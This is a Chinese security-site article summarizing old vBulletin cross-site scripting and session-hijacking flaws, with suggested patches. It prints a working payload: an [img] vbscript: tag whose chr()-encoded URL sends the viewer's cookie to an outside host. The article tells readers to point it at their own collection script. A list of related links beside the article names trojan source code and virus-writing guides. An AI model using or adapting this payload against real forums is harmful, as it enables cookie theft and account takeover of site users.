网页设计   C#  |  服务   FreeBSD   数据库   交换机   编程问答   托福   技术专栏  |  网络   编程   操作系统   Photoshop  |  网页制作

几个VBB的跨站脚本执行漏洞小结

： vbulletin支持在帖子中用户使用[img]/[/img]标记插入图象连接，但它未对标记中的内容做充分过滤，这可能导致攻击者在此标记的内容中放入脚本代码，当其他用户浏览相关此连接的时候，脚本将在用户的浏览器中执行。攻击者可能借此得到用户基于cookie的认证信息。 [code][img]vbscript:location.replace( chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+ chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+ chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+ chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+ chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+ chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+ chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+ chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+ chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+ escape(documents.cookie) )[/img][/code] 上面描述的ascii编码会自动转换为http://www.igngte.barrysworld.net/test.php?c=，可以把路径改为你收集脚本的位置。经过测试该问题除了存在于2.2.2和之前的版本，同时也存在于不是直接安装，而是由旧版本升级的2.2.3与2.2.4. nsfocus提供的临时解决办法： 暂时禁止img标签或者立刻升级 如果你不能立刻升级这里有另外一种解决办法: 在forum/admin/functions.php中找到 1． "stripbrsfromcode(\\5)", 替换为 //"stripbrsfromcode(\\5)", 2． function stripbrsfromcode($foundcode) { $foundcode = str_replace("\\\"","\"",$foundcode); return "代码:--------------------------------------------------------------------------------" . str_replace("", "", str_replace("", "", $foundcode) ) . "--------------------------------------------------------------------------------"; } 替换为 //function stripbrsfromcode($foundcode) { // $foundcode = str_replace("\\\"","\"",$foundcode); // return "代码:--------------------------------------------------------------------------------" . str_replace("", "", str_replace(" //>", "", $foundcode) ) . "--------------------------------------------------------------------------------";//} http://security.nsfocus.com/showquery.asp?bugid=2466该问题在相关连接已有描述，漏洞发现者提供临时解决方法，在vbulletin.com已经对该问题进行讨论，详细可见www.vbulletin.com/member。 session hijacking 登陆用户浏览论坛，连接会以http://somedomain/forum/showthread.php?s=1111111111111111111111111111111111111111&threadid=11111显示。由于暂时不了解情况，只能估计s=1111111111111111111111111111111111111111或者为cookies的hash，如果将url直接发给对方，有可能造成对方以你的id登陆，造成session hijacking 解决方法： 将以传递连接的时候使用http://somedomain/forum/showthread.php?threadid=11111，把中间的s=1111111111111111111111111111111111111111去掉，如果你是用php4.1.0以上版本可以在forum/admin/config.php的后面加入： if(!strstr("$_server[path_translated]", "$_server[document_root]")) { die(); } 如果是较低版本则加入： if(!strstr("$http_server_vars[path_translated]", "$http_server_vars[document_root]")) { die(); } 另外还有二次注册的css： 详细参阅 www.enter.3322.net/cgi-bin/list.cgi 这里提供两种解决方法： 1．禁止在相关位置输入cookie字样(该措施作用不大) 2．修改程序多个模板，把相关的功能暂时屏蔽或禁止（建议）

（）

下一篇：CMOS开机密码解密集锦

• · CMOS开机密码解密集锦
• · Win2000的系统安全防范对策
• · 回眸一看 操作系统发展的历程
• · 小木马cnc源代码及开发文档
• · 一个主引导区病毒的分析
• · 一个简单的文件型病毒程序
• · 一个写硬盘的VBS脚本程序
• · unix系统病毒概述
• · WinNT下使用匿名获得admin权限的几个方法
• · 配置 VMware通过令牌访问LAN
• · Debug 使用简介
• · IE即可轻松远程控制对方电脑
• · 如何利用OutLook漏洞编写病毒脚本
• · “混客绝情炸弹”源代码（1）及手工清除
• · “求职信”病毒/蠕虫行为深入分析
• · 编写感染COM与EXE文件的病毒的样例程序
• · 在Win 2003中配置ASP.net环境
• · 将病毒斩草除根
• · 手机病毒
• · 使用TCP/IP协议栈指纹进行远程操作系统辨识
• · 安全维护 IIS asp 站点的高级技巧
• · 防止内部IP地址泄漏的2种方法
• · 网络常见攻击与防范完全手册
• · Windows NT2000下的硬盘锁
• · CIH硬盘数据恢复方法与实例
• · 清除双关联木马“聪明基因”
• · 104种木马手工清除方法
• · 如何隐藏程序的运行
• · 六十四、WINOWS NT4.0下的网络安全性
• · 六十二、从DOS直接入网NT
• · 六十一、NT网的无盘工作站远程登陆
• · 六十、Windows NT4.0网络中漫游用户配置文件的建立
• · 五十九、配置广域网中的Windows NT
• · 五十八、NT Server用作Internet的网关
• · 五十六、 NT网卡和Novell网卡互用
• · 五十四、如何使NT4.0支持你的调制解调器
• · 本地攻击者利用FreeBSD4.3设计漏洞取得系统特权
• · 计算机网络系统安全漏洞分类研究
• · 利用万象来控制整个网吧
• · WIN2000的输入法入侵
• · 傲者TXT炸弹（标准版）
• · 主页木马的制作方法
• · IIS UNICODE Bug
• · BBS3000漏洞
• · CGI漏洞集锦
• · SNMP漏洞威胁网络安全
• · 安全专家欲以黑制黑
• · 用net命令使局域网文件批量同步更新
• · 安全高招:让溢出攻击远离我们
• · Firefox使用技巧六则
• · 支持Rss,优化速度:傲游1.2.0发布
• · 四十九、从DOS工作站登录NTS4.0服务器
• · 十三、WIN2000下的xcopy可以复制文件的安全设置
• · “网上邻居”如何和平共处？
• · NT的19个秘密武器
• · 如何在WIN2000下共享ADSL
• · MyIM聊天软件全接触——手把手教你玩转MyIM
• · 手把手教你玩压缩：WinRAR初级教程
• · 消除误解 认清容易被误认为病毒的系统文件
• · 用WinRAR解密木马捆绑的原理